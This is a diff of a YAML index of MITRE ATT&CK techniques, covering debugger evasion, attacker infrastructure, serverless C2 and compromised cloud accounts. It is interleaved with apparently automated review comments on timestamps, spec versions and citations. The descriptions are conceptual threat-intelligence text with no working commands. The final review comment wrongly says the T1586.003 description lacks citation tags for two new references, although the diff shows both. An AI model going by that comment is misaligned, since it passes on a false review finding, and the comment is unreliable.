An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -88162,12 +88846,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -88192,7 +88875,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -88247,7 +88929,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
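Review bot: the `modified` timestamp on T1622 moves backwards, from 2022-05-11 to 2022-04-16, and the same regression shows up below on T1583.002 (2022-04-25 to 2021-04-15), T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003. A decreasing `modified` normally means those objects were regenerated from an older or different copy of the data than the rest of the file; confirm the values match the upstream ATT&CK STIX release being imported and not a stale cache, since any consumer that uses `modified` to detect updates will skip these objects.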
@@ -88267,7 +88949,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests:
- name: Detect a Debugger Presence in the Machine
@@ -88382,7 +89063,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests:
- name: System Time Discovery
@@ -88446,7 +89126,7 @@ discovery:
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -88457,7 +89137,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -88528,29 +89208,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
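Review bot: the updated T1583.007 description says `Google Apps Scripts`, while the citation added in the next hunk titles the product `Google Apps Script` (singular); the description should use the product name. Separately, the block that moves `x_mitre_contributors`, `x_mitre_detection`, `x_mitre_is_subtechnique` and `x_mitre_platforms` around is a no-op in YAML but roughly doubles the hunk; a fixed key order in the generator would leave only the real changes (description, new citation, version 1.0 to 1.1) to review.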
@@ -88574,15 +89253,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
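Review bot: the new `GWS Apps Script Abuse 2021` URL ends in `#google_vignette`. A fragment is never sent to the server and this one is an ad-overlay anchor picked up from the browser, not a section of the article, so store the canonical address instead: `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`. The `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0 in the same hunk matches the other updated objects.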
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -88614,17 +89296,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -88677,11 +89358,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -88717,7 +89397,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -88766,43 +89446,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
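Review bot: every line removed here (platforms, domains, marking refs, id, type, created, created_by_ref and the four external_references) is re-added lower in the T1588.004 object by the next hunk, so the only substantive changes are the `modified` bump and, inside the re-added references, the Recorded Future URL moving from `/cobalt-strike-servers/` to `/research/cobalt-strike-servers` with a new retrieval date of September 16, 2024. A diff of this shape hides the real change behind a wholesale move; emitting keys in a stable order would cut it to a handful of lines. I compared the removed and re-added entries for DiginotarCompromise, Let's Encrypt FAQ and Splunk Kovar Certificates 2017 and they are identical apart from key order, so nothing was lost in the move.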
@@ -88815,18 +89464,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
@@ -88848,7 +89528,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -88864,8 +89544,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
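Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1583.002 without adding a replacement, unlike T1583.007 and T1588.004 above where the field is bumped to 3.2.0; the same bare removal repeats for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003. Unless the key is re-added outside the shown context, those objects end up with no ATT&CK spec version while their siblings carry 3.2.0, and consumers that branch on the field will handle them differently. These are also exactly the objects whose `modified` timestamps go backwards, which points to them having been loaded from an older copy of the data; either emit 3.2.0 for them as well or explain why they are exempt.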
T1587.003:
technique:
@@ -88887,7 +89565,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -88907,8 +89585,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -88947,7 +89623,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -88968,8 +89644,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -88999,7 +89673,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -89036,8 +89710,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -89059,7 +89731,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -89081,8 +89753,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -89119,7 +89789,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -89141,8 +89811,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -89204,7 +89872,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -89226,7 +89893,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -89244,8 +89911,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -89280,7 +89945,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -89299,33 +89964,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
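Review bot: the T1586.003 description now covers spam and phishing sent through compromised Twilio, SendGrid, AWS End User Messaging, SNS and SES accounts, but `x_mitre_detection` in the same hunk still only points defenders at the exfiltration stage (T1537). If the messaging use case is in scope, the detection text should also say that abuse of a hijacked messaging account is visible on the receiving side as Phishing (T1566), which the description already links. The bump to `x_mitre_version: '1.1'` is appropriate for this description change; the reordering of `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique` and `x_mitre_platforms` around it is churn only.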
@@ -89335,10 +89998,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
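Review bot: the two new external_references entries (Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022 and Netcraft SendGrid 2024) have no corresponding (Citation: ...) tag anywhere in the description text visible in this patch for T1586.003. A reference without a citation is dead weight, and in the ATT&CK data a new reference normally accompanies a description edit; check that the description hunk includes the matching citation tags, otherwise drop the entries or flag that the generator is emitting stale references. The retrieval dates (March 9, 2023 and October 15, 2024) should also be consistent with the `modified` timestamp chosen for the object.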
@@ -89346,9 +90018,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
